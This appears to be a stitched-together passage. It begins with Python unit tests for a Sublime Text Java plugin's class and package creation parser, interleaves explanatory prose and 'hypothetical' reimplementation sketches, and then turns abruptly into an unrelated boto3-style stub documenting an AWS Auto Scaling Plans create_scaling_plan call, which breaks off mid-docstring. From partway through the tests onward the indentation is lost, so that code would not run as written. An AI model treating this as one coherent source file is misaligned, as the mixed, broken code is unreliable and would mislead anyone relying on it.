                    "package": "bravo.Alpha",
                    "as_main": False,
                    "extends": ["Charlie"],
                    "implements": ["Delta"],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/bravo/Alpha",
                    "file": "alpha/bravo/Alpha/Bravo.java"
                }
            }, {
                "input": "Alpha.Bravo:Charlie,Delta<Echo,Foxtrot",
                "expected": {
                    "relative_path": True,
                    "class_name": "Bravo",
                    "package": "bravo.Alpha",
                    "as_main": False,
                    "extends": ["Charlie", "Delta"],
                    "implements": ["Echo", "Foxtrot"],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/bravo/Alpha",
                    "file": "alpha/bravo/Alpha/Bravo.java"
                }
            }, {
                "input": "~Alpha",
                "expected": {
                    "relative_path": False,
                    "class_name": "Alpha",
                    "package": "",
                    "as_main": False,
                    "extends": [],
                    "implements": [],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/",
                    "file": "alpha/Alpha.java"
                }
            }, {
                "input": "~Alpha.Bravo",
                "expected": {
                    "relative_path": False,
                    "class_name": "Bravo",
                    "package": "Alpha",
                    "as_main": False,
                    "extends": [],
                    "implements": [],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/Alpha",
                    "file": "alpha/Alpha/Bravo.java"
                }
            }, {
                "input": "~Alpha.Bravo.Charlie",
                "expected": {
                    "relative_path": False,
                    "class_name": "Charlie",
                    "package": "Alpha.Bravo",
                    "as_main": False,
                    "extends": [],
                    "implements": [],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/Alpha/Bravo",
                    "file": "alpha/Alpha/Bravo/Charlie.java"
                }
            }, {
                "input": "~Alpha.Bravo.CharlieAsMain",
                "expected": {
                    "relative_path": False,
                    "class_name": "Charlie",
                    "package": "Alpha.Bravo",
                    "as_main": True,
                    "extends": [],
                    "implements": [],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/Alpha/Bravo",
                    "file": "alpha/Alpha/Bravo/Charlie.java"
                }
            }, {
                "input": "~Alpha.Bravo.privateCharlieAsMain",
                "expected": {
                    "relative_path": False,
                    "class_name": "Charlie",
                    "package": "Alpha.Bravo",
                    "as_main": True,
                    "extends": [],
                    "implements": [],
                    "visibility_keyword": "private",
                    "modifier_keyword": "",
                    "directory": "alpha/Alpha/Bravo",
                    "file": "alpha/Alpha/Bravo/Charlie.java"
                }
            }, {
                "input": "~Alpha.Bravo.abstractCharlieAsMain",
                "expected": {
                    "relative_path": False,
                    "class_name": "Charlie",
                    "package": "Alpha.Bravo",
                    "as_main": True,
                    "extends": [],
                    "implements": [],
                    "visibility_keyword": "public",
                    "modifier_keyword": "abstract",
                    "directory": "alpha/Alpha/Bravo",
                    "file": "alpha/Alpha/Bravo/Charlie.java"
                }
            }, {
                "input": "~Alpha.Bravo.ProtectedFinalCharlieAsMain",
                "expected": {
                    "relative_path": False,
                    "class_name": "Charlie",
                    "package": "Alpha.Bravo",
                    "as_main": True,
                    "extends": [],
                    "implements": [],
                    "visibility_keyword": "protected",
                    "modifier_keyword": "final",
                    "directory": "alpha/Alpha/Bravo",
                    "file": "alpha/Alpha/Bravo/Charlie.java"
                }
            }, {
                "input": "~Alpha.Bravo:Charlie",
                "expected": {
                    "relative_path": False,
                    "class_name": "Bravo",
                    "package": "Alpha",
                    "as_main": False,
                    "extends": ["Charlie"],
                    "implements": [],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/Alpha",
                    "file": "alpha/Alpha/Bravo.java"
                }
            }, {
                "input": "~Alpha.Bravo:Charlie,Delta",
                "expected": {
                    "relative_path": False,
                    "class_name": "Bravo",
                    "package": "Alpha",
                    "as_main": False,
                    "extends": ["Charlie", "Delta"],
                    "implements": [],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/Alpha",
                    "file": "alpha/Alpha/Bravo.java"
                }
            }, {
                "input": "~Alpha.Bravo<Charlie,Delta",
                "expected": {
                    "relative_path": False,
                    "class_name": "Bravo",
                    "package": "Alpha",
                    "as_main": False,
                    "extends": [],
                    "implements": ["Charlie", "Delta"],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/Alpha",
                    "file": "alpha/Alpha/Bravo.java"
                }
            }, {
                "input": "~Alpha.Bravo:Charlie<Delta",
                "expected": {
                    "relative_path": False,
                    "class_name": "Bravo",
                    "package": "Alpha",
                    "as_main": False,
                    "extends": ["Charlie"],
                    "implements": ["Delta"],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/Alpha",
                    "file": "alpha/Alpha/Bravo.java"
                }
            }, {
                "input": "~Alpha.Bravo:Charlie,Delta<Echo,Foxtrot",
                "expected": {
                    "relative_path": False,
                    "class_name": "Bravo",
                    "package": "Alpha",
                    "as_main": False,
                    "extends": ["Charlie", "Delta"],
                    "implements": ["Echo", "Foxtrot"],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/Alpha",
                    "file": "alpha/Alpha/Bravo.java"
                }
            }
        ]
        for test in tests:
            info = cmd.parse_create(test["input"])
            for key in test["expected"]:
                if key == "package":
                    self.assertEqual(
                        test["expected"][key],
                        info[key].as_class_path()
                    )
                else:
                    self.assertEqual(test["expected"][key], info[key])
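The cases above exercise a small descriptor grammar: an optional `~` for an absolute package, a dotted class path, then optional `:Extends,...` and `<Implements,...` lists. Below is a hypothetical mini-parser that captures just that shape; it is not Javatar's `parse_create` (which also resolves source folders, modifiers, and the `AsMain` suffix), only an illustration of the grammar:

```python
import re

def parse_descriptor(text):
    """Parse "[~]Dotted.Name[:Ext,...][<Impl,...]"; None on invalid input."""
    m = re.fullmatch(r"(~?)([A-Za-z][\w.]*?)(?::([\w,]+))?(?:<([\w,]+))?", text)
    if not m:
        return None
    tilde, dotted, ext, impl = m.groups()
    parts = dotted.split(".")
    if any(not p for p in parts):
        return None  # leading, trailing, or doubled dots are invalid
    return {
        "relative_path": not tilde,
        "class_name": parts[-1],
        "package": ".".join(parts[:-1]),
        "extends": ext.split(",") if ext else [],
        "implements": impl.split(",") if impl else [],
    }
```

This reproduces the split that the expected values encode (last dotted segment becomes the class name, the rest the package), while rejecting the malformed inputs from the invalid-name tests.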
def test_build_prefix(self):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreateCommand(window)
tests = [
{
"create_type": "Class",
"visibility_keyword": "",
"modifier_keyword": "",
"as_main": False,
"expected": "Class"
}, {
"create_type": "Interface",
"visibility_keyword": "public",
"modifier_keyword": "",
"as_main": False,
"expected": "Public interface"
}, {
"create_type": "Enumerator",
"visibility_keyword": "",
"modifier_keyword": "final",
"as_main": False,
"expected": "Final enumerator"
}, {
"create_type": "Class",
"visibility_keyword": "default",
"modifier_keyword": "abstract",
"as_main": False,
"expected": "Default abstract class"
}, {
"create_type": "Class",
"visibility_keyword": "default",
"modifier_keyword": "abstract",
"as_main": True,
"expected": "Default abstract main class"
}
]
for test in tests:
cmd.args = {
"create_type": test["create_type"]
}
self.assertEqual(
cmd.build_prefix(test),
test["expected"]
)
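The expectations above imply a simple construction rule: join the non-empty keyword parts (visibility, modifier, an optional "main") with the type name, then capitalize only the first letter. A minimal sketch of that rule — hypothetical, the real `JavatarCreateCommand.build_prefix` may differ in detail:

```python
def build_prefix(info, create_type):
    """Hypothetical reconstruction of the prefix rule the tests exercise."""
    parts = [
        info.get("visibility_keyword", ""),
        info.get("modifier_keyword", ""),
        "main" if info.get("as_main") else "",
        create_type,
    ]
    # Join the non-empty parts, then capitalize the first letter only
    return " ".join(p for p in parts if p).capitalize()
```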
def test_quote_list(self):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreateCommand(window)
self.assertEqual(
cmd.quote_list([
"Alpha"
]),
"\"Alpha\""
)
self.assertEqual(
cmd.quote_list([
"Alpha", "Bravo", "Charlie"
]),
"\"Alpha\", \"Bravo\", \"Charlie\""
)
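The two assertions above pin down `quote_list` completely: each name is wrapped in double quotes and the results are comma-separated. A one-line sketch satisfying them (hypothetical reconstruction, not the plugin's actual source):

```python
def quote_list(names):
    """Wrap each name in double quotes, comma-separated."""
    return ", ".join('"%s"' % name for name in names)
```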
def test_build_additional_text_class(self):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreateCommand(window)
cmd.args = {
"create_type": "Class"
}
self.assertEqual(
cmd.build_additional_text({
"extends": ["Alpha", "Bravo"],
"implements": ["Charlie", "Delta"]
}),
", extends \"Alpha\", \"Bravo\", implements \"Charlie\", \"Delta\" "
"[Warning! Class can be extent only once]"
)
self.assertEqual(
cmd.build_additional_text({
"extends": ["Alpha", "Bravo", "Charlie"],
"implements": ["Delta", "Echo", "Foxtrot"]
}),
", extends \"Alpha\", \"Bravo\" and 1 more classes"
", implements \"Delta\", \"Echo\" and 1 more classes "
"[Warning! Class can be extent only once]"
)
def test_build_additional_text_enumerator(self):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreateCommand(window)
cmd.args = {
"create_type": "Enumerator"
}
self.assertEqual(
cmd.build_additional_text({
"extends": ["Alpha"],
"implements": []
}),
", extends \"Alpha\" "
"[Warning! Enumerator use \"implements\" instead of \"extends\"]"
)
def test_build_additional_text_interface(self):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreateCommand(window)
cmd.args = {
"create_type": "Interface"
}
self.assertEqual(
cmd.build_additional_text({
"extends": [],
"implements": ["Alpha"]
}),
", implements \"Alpha\" "
"[Warning! Interface use \"extends\" instead of \"implements\"]"
)
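Taken together, the three `build_additional_text` tests imply: list at most two names per clause, summarize any overflow as "and N more classes", and append a per-type warning (the fixtures preserve the plugin's own ungrammatical "extent"/"use" wording verbatim, so the sketch does too). A hypothetical reconstruction consistent with the expected strings above:

```python
def _quoted_preview(names):
    # Show at most two quoted names, then summarize the overflow
    text = ", ".join('"%s"' % name for name in names[:2])
    if len(names) > 2:
        text += " and %s more classes" % (len(names) - 2)
    return text


def build_additional_text(info, create_type):
    text = ""
    for key in ("extends", "implements"):
        if info.get(key):
            text += ", %s %s" % (key, _quoted_preview(info[key]))
    # Warnings reuse the plugin's exact fixture wording
    if create_type == "Class" and len(info.get("extends", [])) > 1:
        text += " [Warning! Class can be extent only once]"
    elif create_type == "Enumerator" and info.get("extends"):
        text += (' [Warning! Enumerator use "implements"'
                 ' instead of "extends"]')
    elif create_type == "Interface" and info.get("implements"):
        text += (' [Warning! Interface use "extends"'
                 ' instead of "implements"]')
    return text
```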
class TestCreatePackage(unittest.TestCase):
@patch(
"sublime.Window.folders",
return_value=[]
)
@patch(
"sublime.Window.active_view",
return_value=None
)
def test_parse_create_invalid_location(self, *_):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreatePackageCommand(window)
tests = [
"", "~", "alpha.", ".alpha", ".alpha.",
"alpha.bravo.", ".alpha.bravo", ".alpha.bravo.", ":charlie",
"<charlie", ":charlie,delta", "<charlie,delta", "alpha:bravo",
"alpha<bravo", "alpha:bravo<charlie"
]
for test in tests:
self.assertEqual(
cmd.parse_create(test),
"Cannot specify package location"
)
self.assertEqual(
cmd.parse_create("~" + test),
"Cannot specify package location"
)
@patch(
"Javatar.core.state_property._StateProperty.is_project",
return_value=True
)
@patch(
"Javatar.core.state_property._StateProperty.get_source_folder",
return_value="alpha"
)
@patch(
"Javatar.core.state_property._StateProperty.get_dir",
return_value="alpha/bravo"
)
def test_parse_create_invalid_name(self, *_):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreatePackageCommand(window)
tests = [
"", "~", ":", "<", ":<", "<:", "alpha.", ".alpha", ".alpha.",
"alpha.bravo.", ".alpha.bravo", ".alpha.bravo.", ":charlie",
"<charlie", ":charlie,delta", "<charlie,delta", "alpha:bravo",
"alpha<bravo", "alpha:bravo<charlie"
]
for test in tests:
self.assertEqual(
cmd.parse_create(test),
"Invalid package naming"
)
self.assertEqual(
cmd.parse_create("~" + test),
"Invalid package naming"
)
@patch(
"Javatar.core.state_property._StateProperty.is_project",
return_value=True
)
@patch(
"Javatar.core.state_property._StateProperty.get_source_folder",
return_value="alpha"
)
@patch(
"Javatar.core.state_property._StateProperty.get_dir",
return_value="alpha/bravo"
)
def test_parse_create(self, *_):
window = MagicMock(spec=sublime.Window)
cmd = JavatarCreatePackageCommand(window)
tests = [
{
"input": "Alpha",
"expected": {
"package": "bravo.Alpha",
"directory": "alpha/bravo/Alpha"
}
}, {
"input": "Alpha.Bravo",
"expected": {
"package": "bravo.Alpha.Bravo",
"directory": "alpha/bravo/Alpha/Bravo"
}
}, {
"input": "Alpha.Bravo.Charlie",
"expected": {
"package": "bravo.Alpha.Bravo.Charlie",
"directory": "alpha/bravo/Alpha/Bravo/Charlie"
}
}, {
"input": "~Alpha",
"expected": {
"package": "Alpha",
"directory": "alpha/Alpha"
}
}, {
"input": "~Alpha.Bravo",
"expected": {
"package": "Alpha.Bravo",
"directory": "alpha/Alpha/Bravo"
}
}, {
"input": "~Alpha.Bravo.Charlie",
"expected": {
"package": "Alpha.Bravo.Charlie",
"directory": "alpha/Alpha/Bravo/Charlie"
}
}
]
for test in tests:
info = cmd.parse_create(test["input"])
for key in test["expected"]:
if key == "package":
self.assertEqual(
test["expected"][key],
info[key].as_class_path()
)
else:
self.assertEqual(test["expected"][key], info[key])
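The package-creation cases above encode one resolution rule: a leading "~" anchors the path at the source folder, while a plain path is resolved relative to the package of the current directory. A minimal sketch of that rule, assuming the patched values from the tests (source folder "alpha", current package "bravo") as defaults — not the plugin's actual implementation:

```python
def resolve_package(text, source_folder="alpha", current_package="bravo"):
    """Hypothetical sketch of the path resolution the tests exercise."""
    if text.startswith("~"):
        # "~" means: absolute from the source folder root
        package = text[1:]
    else:
        # Otherwise: relative to the current directory's package
        package = "%s.%s" % (current_package, text)
    directory = "%s/%s" % (source_folder, package.replace(".", "/"))
    return package, directory
```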
from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from datetime import datetime
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
def create_scaling_plan(self, ScalingPlanName: str, ApplicationSource: Dict, ScalingInstructions: List) -> Dict:
"""
Creates a scaling plan.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/autoscaling-plans-2018-01-06/CreateScalingPlan>`_
**Request Syntax**
::
response = client.create_scaling_plan(
ScalingPlanName='string',
ApplicationSource={
'CloudFormationStackARN': 'string',
'TagFilters': [
{
'Key': 'string',
'Values': [
'string',
]
},
]
},
ScalingInstructions=[
{
'ServiceNamespace': 'autoscaling'|'ecs'|'ec2'|'rds'|'dynamodb',
'ResourceId': 'string',
'ScalableDimension': 'autoscaling:autoScalingGroup:DesiredCapacity'|'ecs:service:DesiredCount'|'ec2:spot-fleet-request:TargetCapacity'|'rds:cluster:ReadReplicaCount'|'dynamodb:table:ReadCapacityUnits'|'dynamodb:table:WriteCapacityUnits'|'dynamodb:index:ReadCapacityUnits'|'dynamodb:index:WriteCapacityUnits',
'MinCapacity': 123,
'MaxCapacity': 123,
'TargetTrackingConfigurations': [
{
'PredefinedScalingMetricSpecification': {
'PredefinedScalingMetricType': 'ASGAverageCPUUtilization'|'ASGAverageNetworkIn'|'ASGAverageNetworkOut'|'DynamoDBReadCapacityUtilization'|'DynamoDBWriteCapacityUtilization'|'ECSServiceAverageCPUUtilization'|'ECSServiceAverageMemoryUtilization'|'ALBRequestCountPerTarget'|'RDSReaderAverageCPUUtilization'|'RDSReaderAverageDatabaseConnections'|'EC2SpotFleetRequestAverageCPUUtilization'|'EC2SpotFleetRequestAverageNetworkIn'|'EC2SpotFleetRequestAverageNetworkOut',
'ResourceLabel': 'string'
},
'CustomizedScalingMetricSpecification': {
'MetricName': 'string',
'Namespace': 'string',
'Dimensions': [
{
'Name': 'string',
'Value': 'string'
},
],
'Statistic': 'Average'|'Minimum'|'Maximum'|'SampleCount'|'Sum',
'Unit': 'string'
},
'TargetValue': 123.0,
'DisableScaleIn': True|False,
'ScaleOutCooldown': 123,
'ScaleInCooldown': 123,
'EstimatedInstanceWarmup': 123
},
],
'PredefinedLoadMetricSpecification': {
'PredefinedLoadMetricType': 'ASGTotalCPUUtilization'|'ASGTotalNetworkIn'|'ASGTotalNetworkOut'|'ALBTargetGroupRequestCount',
'ResourceLabel': 'string'
},
'CustomizedLoadMetricSpecification': {
'MetricName': 'string',
'Namespace': 'string',
'Dimensions': [
{
'Name': 'string',
'Value': 'string'
},
],
'Statistic': 'Average'|'Minimum'|'Maximum'|'SampleCount'|'Sum',
'Unit': 'string'
},
'ScheduledActionBufferTime': 123,
'PredictiveScalingMaxCapacityBehavior': 'SetForecastCapacityToMaxCapacity'|'SetMaxCapacityToForecastCapacity'|'SetMaxCapacityAboveForecastCapacity',
'PredictiveScalingMaxCapacityBuffer': 123,
'PredictiveScalingMode': 'ForecastAndScale'|'ForecastOnly',
'ScalingPolicyUpdateBehavior': 'KeepExternalPolicies'|'ReplaceExternalPolicies',
'DisableDynamicScaling': True|False
},
]
)
**Response Syntax**
::
{
'ScalingPlanVersion': 123
}
**Response Structure**
- *(dict) --*
- **ScalingPlanVersion** *(integer) --*
The version number of the scaling plan. This value is always 1.
Currently, you cannot specify multiple scaling plan versions.
:type ScalingPlanName: string
:param ScalingPlanName: **[REQUIRED]**
The name of the scaling plan. Names cannot contain vertical bars, colons, or forward slashes.
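The naming constraint above can be checked client-side before making the API call; the service enforces it server-side regardless. A small sketch of such a pre-flight check (an illustration, not part of boto3):

```python
def is_valid_scaling_plan_name(name):
    # Mirrors the documented constraint: no vertical bars, colons,
    # or forward slashes in a scaling plan name.
    return bool(name) and not any(ch in name for ch in "|:/")
```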
:type ApplicationSource: dict
:param ApplicationSource: **[REQUIRED]**
A CloudFormation stack or set of tags. You can create one scaling plan per application source.
- **CloudFormationStackARN** *(string) --*
The Amazon Resource Name (ARN) of an AWS CloudFormation stack.
- **TagFilters** *(list) --*
A set of tags (up to 50).
- *(dict) --*
Represents a tag.
- **Key** *(string) --*
The tag key.
- **Values** *(list) --*
The tag values (0 to 20).
- *(string) --*
:type ScalingInstructions: list
:param ScalingInstructions: **[REQUIRED]**
The scaling instructions.
- *(dict) --*
Describes a scaling instruction for a scalable resource.
The scaling instruction is used in combination with a scaling plan, which is a set of instructions for configuring dynamic scaling and predictive scaling for the scalable resources in your application. Each scaling instruction applies to one resource.
AWS Auto Scaling creates target tracking scaling policies based on the scaling instructions. Target tracking scaling policies adjust the capacity of your scalable resource as required to maintain resource utilization at the target value that you specified.
AWS Auto Scaling also configures predictive scaling for your Amazon EC2 Auto Scaling groups using a subset of parameters, including the load metric, the scaling metric, the target value for the scaling metric, the predictive scaling mode (forecast and scale or forecast only), and the desired behavior when the forecast capacity exceeds the maximum capacity of the resource. With predictive scaling, AWS Auto Scaling generates forecasts with traffic predictions for the two days ahead and schedules scaling actions that proactively add and remove resource capacity to match the forecast.
We recommend waiting a minimum of 24 hours after creating an Auto Scaling group to configure predictive scaling. At minimum, there must be 24 hours of historical data to generate a forecast.
For more information, see `Getting Started with AWS Auto Scaling <https://docs.aws.amazon.com/autoscaling/plans/userguide/auto-scaling-getting-started.html>`__ .
- **ServiceNamespace** *(string) --* **[REQUIRED]**
The namespace of the AWS service.
- **ResourceId** *(string) --* **[REQUIRED]**
The ID of the resource. This string consists of the resource type and unique identifier.
* Auto Scaling group - The resource type is ``autoScalingGroup`` and the unique identifier is the name of the Auto Scaling group. Example: ``autoScalingGroup/my-asg`` .
* ECS service - The resource type is ``service`` and the unique identifier is the cluster name and service name. Example: ``service/default/sample-webapp`` .
* Spot Fleet request - The resource type is ``spot-fleet-request`` and the unique identifier is the Spot Fleet request ID. Example: ``spot-fleet-request/sfr-73fbd2ce-aa30-494c-8788-1cee4EXAMPLE`` .
* DynamoDB table - The resource type is ``table`` and the unique identifier is the resource ID. Example: ``table/my-table`` .
* DynamoDB global secondary index - The resource type is ``index`` and the unique identifier is the resource ID. Example: ``table/my-table/index/my-table-index`` .
* Aurora DB cluster - The resource type is ``cluster`` and the unique identifier is the cluster name. Example: ``cluster:my-db-cluster`` .
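The examples above suggest a simple split rule for a ``ResourceId``: Aurora DB clusters use a colon separator, while every other resource type uses a slash, with the identifier itself possibly containing further slashes (an ECS service or a DynamoDB index). A hedged helper illustrating that rule:

```python
def split_resource_id(resource_id):
    """Split a ResourceId into (resource_type, unique_identifier).

    Illustrative sketch based on the documented examples; Aurora DB
    clusters use "cluster:name", everything else "type/identifier".
    """
    if resource_id.startswith("cluster:"):
        return "cluster", resource_id.split(":", 1)[1]
    resource_type, _, identifier = resource_id.partition("/")
    return resource_type, identifier
```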
- **ScalableDimension** *(string) --* **[REQUIRED]**
The scalable dimension associated with the resource.
* ``autoscaling:autoScalingGroup:DesiredCapacity`` - The desired capacity of an Auto Scaling group.
* ``ecs:service:DesiredCount`` - The desired task count of an ECS service.
* ``ec2:spot-fleet-request:TargetCapacity`` - The target capacity of a Spot Fleet request.
* ``dynamodb:table:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB table.
* ``dynamodb:table:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB table.
* ``dynamodb:index:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB global secondary index.
* ``dynamodb:index:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB global secondary index.
* ``rds:cluster:ReadReplicaCount`` - The count of Aurora Replicas in an Aurora DB cluster. Available for Aurora MySQL-compatible edition and Aurora PostgreSQL-compatible edition.
- **MinCapacity** *(integer) --* **[REQUIRED]**
The minimum capacity of the resource.
- **MaxCapacity** *(integer) --* **[REQUIRED]**
The maximum capacity of the resource. The exception to this upper limit is if you specify a non-default setting for **PredictiveScalingMaxCapacityBehavior** .
- **TargetTrackingConfigurations** *(list) --* **[REQUIRED]**
The structure that defines new target tracking configurations (up to 10). Each of these structures includes a specific scaling metric and a target value for the metric, along with various parameters to use with dynamic scaling.
With predictive scaling and dynamic scaling, the resource scales based on the target tracking configuration that provides the largest capacity for both scale in and scale out.
Condition: The scaling metric must be unique across target tracking configurations.
- *(dict) --*
Describes a target tracking configuration to use with AWS Auto Scaling. Used with ScalingInstruction and ScalingPolicy .
- **PredefinedScalingMetricSpecification** *(dict) --*
A predefined metric. You can specify either a predefined metric or a customized metric.
- **PredefinedScalingMetricType** *(string) --* **[REQUIRED]**
The metric type. The ``ALBRequestCountPerTarget`` metric type applies only to Auto Scaling groups, Spot Fleet requests, and ECS services.
- **ResourceLabel** *(string) --*
Identifies the resource associated with the metric type. You can\'t specify a resource label unless the metric type is ``ALBRequestCountPerTarget`` and there is a target group for an Application Load Balancer attached to the Auto Scaling group, Spot Fleet request, or ECS service.
The format is app/<load-balancer-name>/<load-balancer-id>/targetgroup/<target-group-name>/<target-group-id>, where:
* app/<load-balancer-name>/<load-balancer-id> is the final portion of the load balancer ARN.
* targetgroup/<target-group-name>/<target-group-id> is the final portion of the target group ARN.
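The label format above can be assembled from the two ARNs by taking the final portion of each (the part after the last colon) and stripping the load balancer's leading "loadbalancer/" prefix. A sketch of that assembly; the sample ARNs in the test are illustrative, not from the source:

```python
def build_resource_label(load_balancer_arn, target_group_arn):
    # Both pieces are the final portion of the respective ARN; the
    # load balancer portion drops its leading "loadbalancer/" prefix.
    lb_part = load_balancer_arn.rsplit(":", 1)[1]
    if lb_part.startswith("loadbalancer/"):
        lb_part = lb_part[len("loadbalancer/"):]
    tg_part = target_group_arn.rsplit(":", 1)[1]
    return "%s/%s" % (lb_part, tg_part)
```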
- **CustomizedScalingMetricSpecification** *(dict) --*
A customized metric. You can specify either a predefined metric or a customized metric.
- **MetricName** *(string) --* **[REQUIRED]**
The name of the metric.
- **Namespace** *(string) --* **[REQUIRED]**
The namespace of the metric.
- **Dimensions** *(list) --*
The dimensions of the metric.
Conditional: If you published your metric with dimensions, you must specify the same dimensions in your customized scaling metric specification.
- *(dict) --*
Represents a dimension for a customized metric.
- **Name** *(string) --* **[REQUIRED]**
The name of the dimension.
- **Value** *(string) --* **[REQUIRED]**
The value of the dimension.
- **Statistic** *(string) --* **[REQUIRED]**
The statistic of the metric.
- **Unit** *(string) --*
The unit of the metric.
- **TargetValue** *(float) --* **[REQUIRED]**
The target value for the metric. The range is 8.515920e-109 to 1.174271e+108 (Base 10) or 2e-360 to 2e360 (Base 2).
- **DisableScaleIn** *(boolean) --*
Indicates whether scale in by the target tracking scaling policy is disabled. If the value is ``true`` , scale in is disabled and the target tracking scaling policy doesn\'t remove capacity from the scalable resource. Otherwise, scale in is enabled and the target tracking scaling policy can remove capacity from the scalable resource.
The default value is ``false`` .
- **ScaleOutCooldown** *(integer) --*
The amount of time, in seconds, after a scale-out activity completes before another scale-out activity can start. This value is not used if the scalable resource is an Auto Scaling group.
While the cooldown period is in effect, the capacity that has been added by the previous scale-out event that initiated the cooldown is calculated as part of the desired capacity for the next scale out. The intention is to continuously (but not excessively) scale out.
- **ScaleInCooldown** *(integer) --*
The amount of time, in seconds, after a scale in activity completes before another scale in activity can start. This value is not used if the scalable resource is an Auto Scaling group.
The cooldown period is used to block subsequent scale in requests until it has expired. The intention is to scale in conservatively to protect your application\'s availability. However, if another alarm triggers a scale-out policy during the cooldown period after a scale-in, AWS Auto Scaling scales out your scalable target immediately.
- **EstimatedInstanceWarmup** *(integer) --*
The estimated time, in seconds, until a newly launched instance can contribute to the CloudWatch metrics. This value is used only if the resource is an Auto Scaling group.
- **PredefinedLoadMetricSpecification** *(dict) --*
The predefined load metric to use for predictive scaling. This parameter or a **CustomizedLoadMetricSpecification** is required when configuring predictive scaling, and cannot be used otherwise.
- **PredefinedLoadMetricType** *(string) --* **[REQUIRED]**
The metric type.
- **ResourceLabel** *(string) --*
Identifies the resource associated with the metric type. You can\'t specify a resource label unless the metric type is ``ALBRequestCountPerTarget`` and there is a target group for an Application Load Balancer attached to the Auto Scaling group.
The format is app/<load-balancer-name>/<load-balancer-id>/targetgroup/<target-group-name>/<target-group-id>, where:
* app/<load-balancer-name>/<load-balancer-id> is the final portion of the load balancer ARN.
* targetgroup/<target-group-name>/<target-group-id> is the final portion of the target group ARN.
- **CustomizedLoadMetricSpecification** *(dict) --*
The customized load metric to use for predictive scaling. This parameter or a **PredefinedLoadMetricSpecification** is required when configuring predictive scaling, and cannot be used otherwise.
- **MetricName** *(string) --* **[REQUIRED]**
The name of the metric.
- **Namespace** *(string) --* **[REQUIRED]**
The namespace of the metric.
- **Dimensions** *(list) --*
The dimensions of the metric.
Conditional: If you published your metric with dimensions, you must specify the same dimensions in your customized load metric specification.
- *(dict) --*
Represents a dimension for a customized metric.
- **Name** *(string) --* **[REQUIRED]**
The name of the dimension.
- **Value** *(string) --* **[REQUIRED]**
The value of the dimension.
- **Statistic** *(string) --* **[REQUIRED]**
The statistic of the metric. Currently, the value must always be ``Sum`` .
- **Unit** *(string) --*
The unit of the metric.
- **ScheduledActionBufferTime** *(integer) --*
The amount of time, in seconds, to buffer the run time of scheduled scaling actions when scaling out. For example, if the forecast says to add capacity at 10:00 AM, and the buffer time is 5 minutes, then the run time of the corresponding scheduled scaling action will be 9:55 AM. The intention is to give resources time to be provisioned. For example, it can take a few minutes to launch an EC2 instance. The actual amount of time required depends on several factors, such as the size of the instance and whether there are startup scripts to complete.
The value must be less than the forecast interval duration of 3600 seconds (60 minutes). The default is 300 seconds.
Only valid when configuring predictive scaling.
- **PredictiveScalingMaxCapacityBehavior** *(string) --*
Defines the behavior that should be applied if the forecast capacity approaches or exceeds the maximum capacity specified for the resource. The default value is ``SetForecastCapacityToMaxCapacity`` .
The following are possible values:
* ``SetForecastCapacityToMaxCapacity`` - AWS Auto Scaling cannot scale resource capacity higher than the maximum capacity. The maximum capacity is enforced as a hard limit.
* ``SetMaxCapacityToForecastCapacity`` - AWS Auto Scaling may scale resource capacity higher than the maximum capacity to equal but not exceed forecast capacity.
* ``SetMaxCapacityAboveForecastCapacity`` - AWS Auto Scaling may scale resource capacity higher than the maximum capacity by a specified buffer value. The intention is to give the target tracking scaling policy extra capacity if unexpected traffic occurs.
Only valid when configuring predictive scaling.
- **PredictiveScalingMaxCapacityBuffer** *(integer) --*
The size of the capacity buffer to use when the forecast capacity is close to or exceeds the maximum capacity. The value is specified as a percentage relative to the forecast capacity. For example, if the buffer is 10, this means a 10 percent buffer, such that if the forecast capacity is 50, and the maximum capacity is 40, then the effective maximum capacity is 55.
Only valid when configuring predictive scaling. Required if the **PredictiveScalingMaxCapacityBehavior** is set to ``SetMaxCapacityAboveForecastCapacity`` , and cannot be used otherwise.
The range is 1-100.
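The worked example above (buffer 10, forecast capacity 50, maximum capacity 40, effective maximum 55) follows from applying the buffer percentage to the forecast. A sketch of just that arithmetic, not the service's internal logic:

```python
def effective_max_capacity(forecast, max_capacity, buffer_percent):
    # SetMaxCapacityAboveForecastCapacity: when the forecast reaches
    # or exceeds the configured maximum, raise the effective maximum
    # to the forecast plus buffer_percent of the forecast.
    if forecast >= max_capacity:
        return int(round(forecast * (1 + buffer_percent / 100.0)))
    return max_capacity
```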
- **PredictiveScalingMode** *(string) --*
The predictive scaling mode. The default value is ``ForecastAndScale`` . If the mode is ``ForecastOnly`` , AWS Auto Scaling forecasts capacity but does not create any scheduled scaling actions based on the capacity forecast.
- **ScalingPolicyUpdateBehavior** *(string) --*
